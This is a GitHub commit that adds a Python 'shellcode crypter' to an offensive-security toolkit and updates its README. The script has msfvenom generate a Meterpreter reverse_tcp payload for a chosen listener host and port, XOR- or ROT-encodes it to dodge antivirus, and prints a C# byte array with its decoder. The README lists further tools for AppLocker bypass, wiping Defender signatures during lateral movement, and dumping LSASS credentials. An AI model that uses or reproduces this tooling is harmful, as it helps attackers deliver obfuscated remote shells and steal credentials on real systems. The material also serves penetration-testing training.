Added Python utility for shellcode encoding

108102 · Mar 14, 2021 · 235cf7b · 235cf7b
1 parent ca054ef
commit 235cf7b
Show file tree

Hide file tree

Showing 2 changed files with 83 additions and 0 deletions.
diff --git a/Linux Shellcode Encoder/shellcodeCrypter.py b/Linux Shellcode Encoder/shellcodeCrypter.py
@@ -0,0 +1,82 @@
+#!/usr/bin/python3
+
+# Basic shellcode crypter for C# payloads
+# By Cas van Cooten
+
+import re
+import platform
+import argparse
+import subprocess
+from random import randint
+
+if platform.system() != "Linux":
+    exit("[x] ERROR: Only Linux is supported for this utility script.")
+
+class bcolors:
+    OKBLUE = '\033[94m'
+    OKGREEN = '\033[92m'
+    FAIL = '\033[91m'
+    ENDC = '\033[0m'
+    BOLD = '\033[1m'
+
+# Parse input arguments
+parser = argparse.ArgumentParser()
+parser.add_argument("lhost", help="listener IP to use")
+parser.add_argument("lport", help="listener port to use")
+parser.add_argument("type", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
+parser.add_argument("key", help="the key to encode the payload with (integer)", type=int, nargs='?', default=randint(1,255))
+parser.add_argument("payload", help="the payload type from msfvenom to generate shellcode for (default: windows/x64/meterpreter/reverse_tcp)", nargs='?', default="windows/x64/meterpreter/reverse_tcp")
+args = parser.parse_args()
+
+# Generate the shellcode given the preferred payload
+print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Generating payload {bcolors.OKGREEN}{args.payload}{bcolors.OKBLUE} for LHOST={bcolors.OKGREEN}{args.lhost}{bcolors.OKBLUE} and LPORT={bcolors.OKGREEN}{args.lport}{bcolors.ENDC}")
+result = subprocess.run(['msfvenom', '-p', args.payload, f"LHOST={args.lhost}", f"LPORT={args.lport}", 'exitfunc=thread', "-f", "csharp"], stdout=subprocess.PIPE)
+
+if result.returncode != 0:
+    exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Msfvenom generation unsuccessful. Are you sure msfvenom is installed?{bcolors.ENDC}")
+
+# Get the payload bytes and split them
+payload = re.search(r"{([^}]+)}", result.stdout.decode("utf-8")).group(1).replace('\n', '').split(",")
+
+# Encode the payload with the chosen type and key
+print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.type}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
+for i, byte in enumerate(payload):
+    byteInt = int(byte, 16)
+
+    if args.type == "xor":
+        byteInt = byteInt ^ args.key
+    elif args.type == "rot":
+        byteInt = byteInt + args.key & 255
+    else:
+        exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
+
+    payload[i] = "{0:#0{1}x}".format(byteInt,4)
+
+# Format the output payload
+payLen = len(payload)
+payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL)
+payloadFormatted = f"byte[] buf = new byte[{str(payLen)}] {{\n{payload}\n}};"
+if payLen > 1000:
+    f = open("/tmp/payload.txt", "a")
+    f.write(payloadFormatted)
+    f.close()
+    print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}")
+else:
+    print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}")
+    print(payloadFormatted + "\n")
+
+# Provide the decoding function for the heck of it
+print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
+if args.type == "xor":
+    decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
+{{
+    buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
+}}"""
+
+if args.type == "rot":
+    decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
+{{
+    buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
+}}"""
+
+print(decodingFunc)
diff --git a/README.md b/README.md
@@ -14,6 +14,7 @@ $assem = [System.Reflection.Assembly]::Load($data)
 |--|--|
 | AppLocker Bypass PowerShell Runspace (C#) | Base binary for an applocker bypass using a combination of `CertUtil`, `BitsAdmin`, and `InstallUtil`. See `README.md` for details.|
 | Fileless Lateral Movement (C#) | Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`. |
+|Linux Shellcode Encoder (Python) | A utility script to encode C# payloads from Linux, automatically feeding from 'msfvenom'. Supports XOR and ROT encoding with an arbitrary key, and prints the decoding function. Can be used to replace the C# ROT/XOR encoder scripts.|
 |Linux Shellcode Loaders (C) |Various C-based shellcode loaders, including base binaries for library hijacking.|
 |MiniDump (C# & PS1) |A simple binary to Dump LSASS to `C:\Windows\Tasks\lsass.dmp`. Also provided as native PowerShell script.|
 |MSSQL (C#)|An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.|